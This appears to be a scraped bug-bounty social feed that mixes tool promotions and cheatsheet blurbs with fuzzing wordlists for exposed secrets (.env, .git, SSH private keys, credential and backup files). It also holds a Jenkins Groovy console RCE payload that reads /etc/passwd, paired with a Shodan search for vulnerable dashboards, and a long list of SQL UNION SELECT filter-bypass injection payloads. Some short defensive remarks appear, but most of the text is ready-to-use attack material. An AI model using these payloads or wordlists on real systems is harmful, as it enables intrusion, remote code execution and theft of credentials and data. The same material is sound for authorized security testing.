Hello everyone, use this tool:
Bounty Prompt: AI-Powered Burp Suite extension
https://bountysecurity.ai/blogs/news/bounty-prompt-ai-powered-burp-suite-extension
Bounty Security
Bounty Prompt: AI-Powered Burp Suite extension
Introduction
Bounty Prompt is an open source Burp Suite extension developed by Bounty Security. Leveraging advanced AI technology through Burp AI, this tool enables you to generate intelligent prompts for security testing by analyzing selected HTTP requests…
🐧_Bash_Script_Cheatsheet_Automate,_Simplify_and_Command_🎯_.pdf
3.8 MB
🐧 Bash Script Cheatsheet – Automate, Simplify & Command! 🎯💻
🔹 Master Bash Scripting – Automate tasks like a pro! ⚡️
🔹 Learn Commands, Loops, Variables & More – Simplify system management! 🛠
🔹 Essential for Hackers, DevOps & SysAdmins! 🚀
Recon like Pro.pdf
1.3 MB
🔍 Master Networking & Recon – The Backbone of Hacking! 💻🔥
1️⃣ Networking is the key to understanding how data moves.
2️⃣ TCP/IP, DNS, and HTTP help uncover vulnerabilities.
3️⃣ Reconnaissance is where real hacking begins! 🕵️♂️
4️⃣ Better Recon = More Bugs, More Payouts! 💰
🚀 Want to level up your Bug Bounty & Recon skills?
Top 25 JavaScript file paths that may hold sensitive information in a web application
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
Sensitive version-control files found by fuzzing key .git and .svn paths. None of these should be served by the web server.
/.git
/.gitkeep
/.git-rewrite
/.gitreview
/.git/HEAD
/.gitconfig
/.git/index
/.git/logs
/.svnignore
/.gitattributes
/.gitmodules
/.svn/entries
Configuration and position-sensitive files
config.php
config.json
config.yaml
config.yml
config.ini
config.xml
config.db
configuration.php
database.yml
database.json
database.ini
database.xml
local.config
web.config
application.properties
application.yml
connections.ini
credentials.json
settings.py
settings.xml
app.config
firebase.json
aws-credentials
Important environment files and variables
.env
.env.local
.env.dev
.env.production
.env.staging
.env.testing
.env.example
.env.backup
.env.bak
.env.old
.env~
.env.default
/opt/app/.env
/home/user/.env
Backup files and old versions
index.php.bak
config.old
config.bak
database.sql.gz
database_backup.sql
database_dump.sql
database_export.sql
wp-config.php~
.htpasswd.bak
.htpasswd.old
.htaccess.bak
.htaccess.old
admin.bak
backup.zip
backup.tar.gz
backup.sql
backup_old.sql
old_version.zip
old_config.php
Log and debug files
debug.log
error.log
access.log
server.log
php_errors.log
trace.log
system.log
log.txt
logs/debug.log
logs/error.log
logs/system.log
logs/app.log
Private key files and API keys
id_rsa
id_rsa.pub
id_dsa
id_ecdsa
id_ed25519
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/authorized_keys
secrets.json
apikey.txt
google-cloud.json
aws-credentials
jwt_private.pem
jwt_public.pem
private.key
public.key
Miscellaneous files worth testing
composer.lock
composer.json
package.json
package-lock.json
.bash_history
.bashrc
.zshrc
.gitignore
.gitconfig
.gitattributes
.idea/workspace.xml
.vscode/settings.json
.vscode/launch.json
.vscode/tasks.json
Dockerfile
docker-compose.yml
nginx.conf
apache2.conf
httpd.conf
php.ini
robots.txt
sitemap.xml
sitemap_index.xml
crossdomain.xml
security.txt
CORS
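RCE via an exposed Jenkins Groovy script console. The console executes arbitrary Groovy with the privileges of the Jenkins process, so it must never be reachable without administrator authentication.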
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
#BugBounty #bugbountytips #RCE
Hello everyone, try my custom, advanced recon engine:
https://haxshadow.github.io/reconengine/
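SQL UNION SELECT filter-bypass variants. Every entry below is the same two keywords re-encoded or split with comments, case changes or whitespace, which is why keyword blocklists fail against them; parameterized queries are unaffected by any of these forms.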
#Bypass #SQL
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL